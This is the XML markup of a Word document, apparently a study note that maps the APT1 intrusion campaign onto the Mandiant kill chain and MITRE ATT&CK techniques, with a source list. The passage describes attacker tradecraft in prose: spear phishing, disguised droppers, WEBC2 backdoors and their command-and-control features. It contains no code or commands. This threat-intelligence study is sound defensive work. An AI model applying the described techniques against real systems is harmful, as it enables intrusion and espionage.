            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C8DC16" w14:textId="0B3E8C89" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B01786" w14:textId="77777777" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Pass info back</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="06DAF0C0" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17FCF80A" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC44DA8" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BE3FE73" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A54224" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33ED31CC" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386E68C2" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E73A0B" w14:textId="134AD231" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BAA7F1A" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00461F9A" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="2961BBA6" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78DE21AC" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CBEADF4" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A246E31" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A40DB7" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D67FADA" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46751A79" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AAEFD00" w14:textId="19FAD2C9" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762CA278" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00461F9A" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="428D8388" w14:textId="77777777" w:rsidR="002252F8" w:rsidRPr="0077286F" w:rsidRDefault="002252F8" w:rsidP="002252F8"/>
    <w:p w14:paraId="49FBCEF3" w14:textId="77777777" w:rsidR="002252F8" w:rsidRPr="00C94979" w:rsidRDefault="002252F8" w:rsidP="002252F8"/>
    <w:p w14:paraId="0081B167" w14:textId="69E72B62" w:rsidR="00F309DE" w:rsidRDefault="00F309DE" w:rsidP="005A144C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>APT1 | Exposing China's Cyber Espionage Units | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6478509A" w14:textId="31D61086" w:rsidR="0051709F" w:rsidRDefault="0051709F" w:rsidP="005A144C">
      <w:r w:rsidRPr="0051709F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1a] </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>APT1: Exposing One of China’s Cyber Espionage Units | Mandiant | FireEye</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02C75468" w14:textId="30319029" w:rsidR="00362CAC" w:rsidRDefault="00362CAC" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">‘Operation </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Oceansalt</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group (mcafee.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7874546D" w14:textId="74E14667" w:rsidR="003C2AE8" w:rsidRDefault="003C2AE8" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>978-3-030-10543-3_10.pdf (springer.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D1E76">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>via Google search</w:t>
      </w:r>
      <w:r w:rsidR="004D1E76">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156CF8A" w14:textId="762F4135" w:rsidR="0051709F" w:rsidRDefault="0051709F" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WEBC2, Software S0109 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (ATT&amp;CK info on APT1 webc2 techniques)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE575A9" w14:textId="7B050BA1" w:rsidR="00681449" w:rsidRDefault="00681449" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:anchor=":~:text=Telvent%20said%20the%20attacker(s,advanced%20%E2%80%9Csmart%20grid%E2%80%9D%20technologies." w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Chinese Hackers Blamed for Intrusion at Energy Industry Giant </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Telvent</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> – Krebs on Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google search “</w:t>
      </w:r>
      <w:r w:rsidRPr="00681449">
        <w:t xml:space="preserve">security breach at  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00681449">
        <w:t>Telvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00681449">
        <w:t xml:space="preserve"> Canada</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C0BC3" w14:textId="06C1916E" w:rsidR="00EC7C0B" w:rsidRDefault="00EC7C0B" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cti</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-documentation/apt1.json at main · oasis-open/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cti</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-documentation · GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AF4DBC3" w14:textId="4BB363FE" w:rsidR="00264FA7" w:rsidRDefault="00264FA7" w:rsidP="005A144C">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">examples/threat-reports/apt1.json · 1b1b9c6b2144ef16cb9c586717100f2ac4da66d9 · Annie Didier / </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>stix</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-schemas · GitLab (ased.io)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11B1A959" w14:textId="3AC48919" w:rsidR="007F65EC" w:rsidRDefault="007F65EC" w:rsidP="005A144C">
      <w:r>
        <w:t>It does appear that potentially this group is now dormant, but attack included here as an example from the MITRE suites. China seems to have rationalised attack groups and realigning to national strategies. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> also </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00180919">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://duo.com/decipher/chinese-cyber-espionage-apts-refocus-strategy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC5934" w14:textId="64D4279C" w:rsidR="00264FA7" w:rsidRDefault="00691E0D" w:rsidP="005A144C">
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00264FA7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>The Mysterious Return of Years-Old APT1 Malware | WIRED</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FAECD00" w14:textId="77777777" w:rsidR="002B7702" w:rsidRDefault="002B7702" w:rsidP="005A144C"/>
    <w:p w14:paraId="22D78B22" w14:textId="77777777" w:rsidR="002B7702" w:rsidRDefault="002B7702" w:rsidP="005A144C"/>
    <w:p w14:paraId="6F2EE063" w14:textId="3FFB32C5" w:rsidR="00085BC0" w:rsidRDefault="00085BC0" w:rsidP="005A144C">
      <w:r>
        <w:t>Using Mandiant Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787B6B5" w14:textId="0407AE18" w:rsidR="00085BC0" w:rsidRPr="00085BC0" w:rsidRDefault="002B7702" w:rsidP="005E7421">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00085BC0" w:rsidRPr="00085BC0">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Initial Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14340AC5" w14:textId="09D4E5FC" w:rsidR="005A144C" w:rsidRDefault="005E7421" w:rsidP="005E7421">
      <w:r>
        <w:t>P28 - The Initial Compromise represents the methods intruders use to first penetrate a target organization’s network. As with most other APT groups, spear phishing is APT1’s most commonly used technique. The spear phishing emails contain either a malicious attachment or a hyperlink to a malicious file.</w:t>
      </w:r>
      <w:r w:rsidR="00C15CC4">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C15CC4" w:rsidRPr="00C15CC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.001 Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C15CC4" w:rsidRPr="00C15CC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C15CC4" w:rsidRPr="00C15CC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment, T1566.002 Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C15CC4" w:rsidRPr="00C15CC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C15CC4" w:rsidRPr="00C15CC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r w:rsidR="00C15CC4">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBE2DC" w14:textId="55223266" w:rsidR="005C3532" w:rsidRDefault="005C3532" w:rsidP="005C3532">
      <w:r>
        <w:t xml:space="preserve">This file is actually a dropper for a custom APT1 backdoor that we call WEBC2-QBP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3532">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C3532">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF456C9" w14:textId="4A25DAF5" w:rsidR="0082510B" w:rsidRDefault="0082510B" w:rsidP="0082510B">
      <w:r>
        <w:t xml:space="preserve">Some APT1 actors have gone to the trouble of making the malicious software inside their ZIP files look like benign Adobe PDF files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAA32F" w14:textId="4A62B044" w:rsidR="00E5018D" w:rsidRPr="00085BC0" w:rsidRDefault="00316A64" w:rsidP="00E5018D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00E5018D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Establish Foothold</w:t>
      </w:r>
      <w:r w:rsidR="00710E18">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (p30+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1870F" w14:textId="0B786F08" w:rsidR="00E5018D" w:rsidRDefault="00C9752D" w:rsidP="005C3532">
      <w:r w:rsidRPr="00C9752D">
        <w:t>APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26484898" w14:textId="4253862A" w:rsidR="00C9752D" w:rsidRDefault="00C9752D" w:rsidP="005C3532">
      <w:r>
        <w:t>In almost every case, APT backdoors initiate outbound connections to the intruder’s “command and control” (C2) server.</w:t>
      </w:r>
      <w:r w:rsidR="00DE4245">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DE4245">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003E52D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E52D1" w:rsidRPr="003E52D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1071.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E52D1" w:rsidRPr="003E52D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Layer Protocol: Web Protocols</w:t>
      </w:r>
      <w:r w:rsidR="00DE4245">
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
      <w:r w:rsidR="00425EEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D68BA" w14:textId="73A14F0E" w:rsidR="00425EEB" w:rsidRDefault="00425EEB" w:rsidP="003E52D1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>APT1’s beachhead backdoors are usually what we call WEBC2 backdoors. WEBC2 backdoors are probably the most well-known kind of APT1 backdoor, and are the reason why some security companies refer to APT1 as the “Comment Crew.” A WEBC2 backdoor is designed to retrieve a webpage from a C2 server. It expects the webpage to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F6636" w14:textId="23EC8510" w:rsidR="00C9752D" w:rsidRDefault="00C9752D" w:rsidP="00C9752D">
      <w:r>
        <w:t>While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT, the vast majority of the time they use what appear to be their own custom backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B97DD8" w14:textId="6A1A1A29" w:rsidR="00710E18" w:rsidRDefault="00710E18" w:rsidP="00710E18">
      <w:r>
        <w:t>APT1’s backdoors in two categories: “Beachhead Backdoors” and “Standard Backdoors.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A826C" w14:textId="1A34EB21" w:rsidR="003C51A0" w:rsidRDefault="003C51A0" w:rsidP="003C51A0">
      <w:r>
        <w:t>Beachhead backdoors are typically minimally featured. They offer the attacker a toe-hold to perform simple tasks like retrieve files, gather basic system information and trigger the execution of other more significant capabilities such as a standard backdoor</w:t>
      </w:r>
      <w:r w:rsidR="0027266E">
        <w:t xml:space="preserve"> (WEBC2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28E73C" w14:textId="1568FC87" w:rsidR="0027266E" w:rsidRDefault="0027266E" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>WEBC2 backdoors typically give APT1 attackers a short and rudimentary set of commands to issue to victim systems, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BDCF0" w14:textId="77777777" w:rsidR="0027266E" w:rsidRDefault="0027266E" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>» Open an interactive command shell (usually Windows’ cmd.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B97AB7F" w14:textId="77777777" w:rsidR="0027266E" w:rsidRDefault="0027266E" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>» Download and execute a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D0775" w14:textId="2D7A928E" w:rsidR="0027266E" w:rsidRDefault="0027266E" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>» Sleep (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remain inactive) for a specified amount of time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52552D86" w14:textId="2A07CCC7" w:rsidR="0027266E" w:rsidRDefault="0027266E" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Once installed, APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847B674" w14:textId="0AA4E61A" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731C3036" w14:textId="53F86693" w:rsidR="002B7702" w:rsidRDefault="002B7702" w:rsidP="00B30CB4">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>[1] Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol. APT1 has created a handful of these, including….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27662B60" w14:textId="4635BE4D" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The standard, non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol (to blend in with legitimate web traffic) or a custom protocol that the malware authors designed themselves. These backdoors give APT intruders a laundry list of ways to control victim systems, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE89D6" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>»» Create/modify/delete/execute programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BACB41" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Upload/download files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1467C2" w14:textId="77777777" w:rsidR="0038594F" w:rsidRDefault="0038594F" w:rsidP="0038594F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>»» Create/delete directories</w:t>
      </w:r>
    </w:p>
